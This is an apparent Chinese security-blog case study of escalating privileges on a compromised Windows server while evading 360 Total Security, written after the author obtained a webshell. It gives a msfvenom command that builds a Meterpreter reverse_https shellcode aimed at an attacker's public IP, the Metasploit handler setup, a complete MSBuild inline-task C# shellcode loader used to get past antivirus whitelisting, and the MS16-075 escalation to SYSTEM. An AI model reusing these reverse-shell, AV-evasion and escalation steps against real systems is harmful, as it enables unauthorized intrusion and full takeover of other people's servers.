绕过360安全卫士提权实战案例

  • A+
所属分类:安全文章
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

所有话题标签:

#Web安全   #漏洞复现   #工具使用   #权限提升

#权限维持   #防护绕过   #内网安全   #实战案例

#其他笔记   #资源分享   #MSF


0x01 前言

这个案例也是帮一个朋友看的,拿到Webshell权限后先对目标机器进行了简单的信息搜集,通过以下信息基本能确定目标机器上安装的有360安全卫士和宝塔Windows服务器运维管理面板,其中包括有宝塔安装的MySQL数据库和FileZilla Server软件等。

0x02 信息搜集

目标机器基本信息:
支持脚本:ASPPHP(不能执行命令)目标系统:Windows 2008 R2IIS7.5当前权限:iis apppool**********.com开放端口:21、80、135、888、3306、6088、8888、12828(TermService进程名称:360tray.exeZhuDongFangYu.exeFileZilla_Server.exemysqld.exerunserver.exebtPanel)、task.exebtTask)、python.exeKuaiYun.exe(景安云自带插件)
绕过360安全卫士提权实战案例

注:这里因为宝塔安装目录权限和随机密码安全机制的问题,D:BtSoft目录没有读取和写入权限,所以我们没办法直接利用目标机器上的MySQL、FileZilla Server来进行权限提升。
绕过360安全卫士提权实战案例

0x03 实战提权过程

(1) 笔者根据个人经验感觉可以利用MS16-075来进行权限提升,但是由于目标机器存在360安全卫士,在提权过程中遇到了不少问题,比如我们上传的Windows Payload、大部分提权EXP以及其它恶意程序在执行过程中都会被360安全卫士查杀,首次执行无回显,二次执行已被查杀
绕过360安全卫士提权实战案例

(2) web_delivery、hta_server模块生成的Payload也会被目标机器上的360安全卫士的Powershell进程防护拦截,mshta.exe可以被正常执行,但执行底层powershell.exe会被拦截。

绕过360安全卫士提权实战案例


(3) 因为目标机器用的宝塔Windows服务器运维管理面板,默认安装的有Python环境,利用Python Payload可以成功得到会话,但是无法使用incognito扩展和MS16-075模块
绕过360安全卫士提权实战案例

(4) 使用php/meterpreter/reverse_tcp得到的会话功能有限,很多命令执行不了,同样无法使用incognito扩展和MS16-075模块。
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例

(5) 笔者最终是通过MSBuild.exe白名单成功得到目标机器Meterpreter会话,这里需要将x86会话进程注入到x64进程中去,然后再利用ms16_075_reflection_juicy本地权限提升模块成功拿到目标SYSTEM权限,其它白名单也就没有再去测试了(留了个坑,自己去踩)0.0 !
[email protected]:~# msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_https LHOST=公网IP地址 LPORT=5555 -f csharp
msf5 > use exploit/multi/handlermsf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_httpsmsf5 exploit(multi/handler) > set lhost 公网IP地址msf5 exploit(multi/handler) > set lport 5555msf5 exploit(multi/handler) > exploit
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例

0x04 MSBuild白名单

<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">         <!-- This inline task executes shellcode. -->         <!-- C:WindowsMicrosoft.NETFrameworkv4.0.30319msbuild.exe SimpleTasks.csproj -->         <!-- Save This File And Execute The Above Command -->         <!-- Author: Casey Smith, Twitter: @subTee -->         <!-- License: BSD 3-Clause -->    <Target Name="Hello">      <ClassExample />    </Target>    <UsingTask      TaskName="ClassExample"      TaskFactory="CodeTaskFactory"      AssemblyFile="C:WindowsMicrosoft.NetFrameworkv4.0.30319Microsoft.Build.Tasks.v4.0.dll" >      <Task>
<Code Type="Class" Language="cs"> <![CDATA[ using System; using System.Runtime.InteropServices; using Microsoft.Build.Framework; using Microsoft.Build.Utilities; public class ClassExample : Task, ITask { private static UInt32 MEM_COMMIT = 0x1000; private static UInt32 PAGE_EXECUTE_READWRITE = 0x40; [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr, UInt32 size, UInt32 flAllocationType, UInt32 flProtect); [DllImport("kernel32")] private static extern IntPtr CreateThread( UInt32 lpThreadAttributes, UInt32 dwStackSize, UInt32 lpStartAddress, IntPtr param, UInt32 dwCreationFlags, ref UInt32 lpThreadId ); [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject( IntPtr hHandle, UInt32 dwMilliseconds ); public override bool Execute() { byte[] shellcode = new byte[] { Insert Shellcode Here };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE); Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length); IntPtr hThread = IntPtr.Zero; UInt32 threadId = 0; IntPtr pinfo = IntPtr.Zero; hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId); WaitForSingleObject(hThread, 0xFFFFFFFF); return true; } } ]]> </Code> </Task> </UsingTask> </Project>

只需在公众号回复“HackTheBox”关键字即可领取一套HTB靶场的学习文档和视频,你还在等什么???




【往期TOP5】
星外虚拟主机提权实战案例
VHAdmin虚拟主机提权实战案例
记一次因“打码”不严的渗透测试
TP-RCE绕过阿里云防护Getshell
看图识WAF-搜集常见WAF拦截页面



绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例  如果对你有所帮助,点个分享、赞、在看呗!绕过360安全卫士提权实战案例

本文始发于微信公众号(潇湘信安):绕过360安全卫士提权实战案例

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: